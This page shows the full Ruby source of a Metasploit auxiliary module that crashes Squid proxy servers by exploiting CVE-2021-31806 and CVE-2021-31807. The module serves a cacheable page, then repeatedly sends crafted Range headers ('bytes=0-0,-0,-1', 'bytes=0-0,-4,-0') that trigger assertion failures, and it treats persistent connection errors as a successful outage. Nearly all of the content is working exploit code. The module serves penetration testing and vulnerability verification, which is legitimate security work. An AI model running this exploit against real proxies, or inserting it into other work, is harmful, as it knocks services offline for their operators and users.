Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/http/squid_range_dos.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Exploit::Remote::HttpServer8include Msf::Auxiliary::Dos910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Squid Proxy Range Header DoS',15'Description' => %q{16The range handler in The Squid Caching Proxy Server 3.0-4.1.4 and175.0.1-5.0.5 suffers from multiple vulnerabilities triggered18by specific HTTP requests and responses.1920These vulnerabilities allow remote attackers to cause a21denial of service through specifically crafted requests.22},23'Author' => [24'Joshua Rogers' # Discoverer, and Metasploit Module25],26'License' => MSF_LICENSE,27'Actions' => [28['DOS', { 'Description' => 'Perform Denial of Service Against The Target' }]29],30'DefaultAction' => 'DOS',31'References' => [32[ 'CVE', '2021-31806'],33[ 'CVE', '2021-31807'],34[ 'URL', 'https://blogs.opera.com/security/2021/10/fuzzing-http-proxies-squid-part-2/']35],36'DisclosureDate' => '2021-05-27',37'Notes' => {38'Stability' => [ CRASH_SERVICE_DOWN ],39'Reliability' => [ ],40'SideEffects' => [ IOC_IN_LOGS ]41}42)43)4445register_options(46[47Opt::RPORT(3128),48OptInt.new('REQUEST_COUNT', [ true, 'The number of requests to be sent, as well as the number of re-tries to confirm a dead host', 50 ]),49OptEnum.new('CVE', [50true, 'CVE to check/exploit', 'CVE-2021-31806',51['CVE-2021-31806', 'CVE-2021-31807']52]),53]54)55end5657def on_request_uri(cli, _request)58# The Last-Modified response header must be set such that Squid caches the page.59send_response(cli, '<html></html>', { 'Last-Modified' => 'Mon, 01 Jan 2020 00:00:00 GMT' })60end6162def run63count = 064error_count = 0 # The amount of connection errors from the server.65reqs = datastore['REQUEST_COUNT'] # The maximum amount of requests (with a valid response) to the server.6667print_status("Sending #{reqs} DoS requests to #{peer}")6869start_service7071while reqs > count72begin73res = req(datastore['CVE'])74rescue Errno::ECONNRESET75res = nil76end7778if res && (res.code == 200) && (count == 0)79count = 180print_status("Sent first request to #{rhost}:#{rport}")81elsif res82print_status("Sent DoS request #{count} to #{rhost}:#{rport}")83count += 184error_count = 08586next # Host could be completely dead, or just waiting for another Squid child.87elsif count == 088print_error('Cannot connect to host.')89return90end9192error_count += 193next unless error_count > reqs # If we cannot connect after `res` amount of attempts, assume the DoS was successful.9495print_good('DoS completely successful.')96report_vuln(97host: rhost,98port: rport,99name: name,100refs: references101)102return103end104print_error('Looks like the host is not vulnerable.')105end106107def req(cve)108case cve109when 'CVE-2021-31806'110sploit = cve_2021_31806111when 'CVE-2021-31807'112sploit = cve_2021_31807113end114115send_request_raw({116'uri' => get_uri,117'headers' => {118'Host' => "#{srvhost_addr}:#{srvport}",119'Range' => sploit,120'Cache-Control' => 'public'121}122})123end124125def cve_2021_31806126# This will cause Squid to assert with "http->out.offset <= start"127%(bytes=0-0,-0,-1)128end129130def cve_2021_31807131# This will cause Squid to assert with "!http->range_iter.debt() == !http->range_iter.currentSpec()"132%(bytes=0-0,-4,-0)133end134135end136137138